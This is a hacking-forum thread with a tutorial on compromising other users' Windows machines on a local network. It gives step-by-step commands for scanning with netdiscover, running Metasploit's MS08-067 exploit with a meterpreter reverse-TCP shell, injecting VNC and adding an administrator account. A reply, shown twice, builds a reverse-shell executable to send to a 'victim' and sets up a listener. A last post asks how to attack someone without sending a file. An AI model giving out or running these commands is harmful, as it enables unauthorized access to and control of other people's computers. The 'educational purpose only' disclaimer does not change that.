MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: Metasploit Hacking in LAN
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Salam Guyz,

Today i'll show y0uh how to use Metasploit(Msfconsole)
to hack someone in y0ur LAN(Local Area Network)

things y0u'll need
1) Backtrack
2) Metasploit
3) users in LAN

so tym t0 play the Game! Xd

1st get y0ur ip by typing ifconfig in backtrack terminal and get y0ur internel ip
192.168.x.x
n0w 0n y0ur bt and open terminal and type
netdiscover -r 192.168.1.0/24
-r means Range
let it scan the network
after scanning y0u can pick any ip for hacking ;) :P

N0w G0to
Application => Exploitation Tools=>Network Exploitation => metasploit => msfconsole
or y0u can simply type in terminal => msfconsole
after msfconsole loaded type
set lhost 192.168.x.x (your internel ip)
LHOST => your internel ip will appear

then
set rhost (victim's ip address y0u g0t from scanning)
RHOST => 192.168.x.x (victims internel ip)

N0w Choosing V.i.P Exploit and PayloaD

Exploit= netapi And PayloaD= meterpreter reverse TCP BEST!!!

type

use windows/metasploit/ms08_067_netapi
exploit => ms_08_067_netapi

then type

set payload/windows/meterpreter/reverse_tcp
PAYLOAD => Meterpreter

now just type exploit
exploit

and it will start exploiting :P
you can get remote desktop by changing payload ..
set payload windows/vncinject/reverse_tcp

Y0u Can als0 add an administrator Remotely!

meterpreter>run getgui -u username -p password
-u is username And -P is password :P

HaPpY Exploiting in Y0ur LAN =P

Note:- For EducatioaL Purpose Only !!
it Will Only W0rk if y0ur victim's machine is On and Working !
./kidcosec.net
this is not so easy as it look like.. this exploit work on open port 445 Smiley1 and its only for windows XP.. ..and yep..one more thing ..you have to make sure that port no 445 is opened in victim pc Smiley1 and victim is on XP..... then it works perfect.. but when the victim is on windows 7 Smiley1 you cant attack the victim .. even if port no 445 is opened so.. you also need to generate a .exe payload and must have to send victim for this exploit ( there are other methods that dont include file sending ) i.e using applet attacks Smiley1 (browser auto pwn) to generate .exe payload open up a terminal and type the following command
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /root/Desktop/madleets.exe

a file name madleets.exe will be generated on your desktop
now send the file to victim and open a terminal and open metasploit
and in msfconsole
type the following command

Code:
use exploit/multi/handler
set lhost=192.168.1.2
set lport=4444
exploit
this will listen for incoming sessions
and when someone click on the madleets.exe
you will see a meterpreter session opening up wink
(01-07-2013, 02:19 AM)madcodE Wrote: [ -> ]this is not so easy as it look like.. this exploit work on open port 445 Smiley1 and its only for windows XP.. ..and yep..one more thing ..you have to make sure that port no 445 is opened in victim pc Smiley1 and victim is on XP..... then it works perfect.. but when the victim is on windows 7 Smiley1 you cant attack the victim .. even if port no 445 is opened so.. you also need to generate a .exe payload and must have to send victim for this exploit ( there are other methods that dont include file sending ) i.e using applet attacks Smiley1 (browser auto pwn) to generate .exe payload open up a terminal and type the following command
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /root/Desktop/madleets.exe

a file name madleets.exe will be generated on your desktop
now send the file to victim and open a terminal and open metasploit
and in msfconsole
type the following command

Code:
use exploit/multi/handler
set lhost=192.168.1.2
set lport=4444
exploit
this will listen for incoming sessions
and when someone click on the madleets.exe
you will see a meterpreter session opening up wink

i am in a situation i can't send file to someone who is on windows is there a another way which might help me ?